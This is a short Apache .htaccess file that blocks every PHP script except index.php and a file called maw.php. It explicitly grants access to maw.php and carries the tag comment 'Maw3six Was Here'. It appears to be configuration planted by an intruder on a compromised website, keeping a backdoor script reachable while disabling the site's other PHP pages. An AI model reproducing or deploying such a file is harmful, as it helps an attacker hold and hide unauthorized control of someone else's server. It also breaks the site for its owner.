<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /

RewriteCond %{REQUEST_URI} !^/index.php$ [NC]
RewriteCond %{REQUEST_URI} !^/maw.php$ [NC]
RewriteCond %{REQUEST_URI} \.php$ [NC]
RewriteRule ^.*$ - [R=403,L]

# Maw3six Was Here
<Files "maw.php">
  Order allow,deny
  Allow from all
  Satisfy any
</Files>

</IfModule>
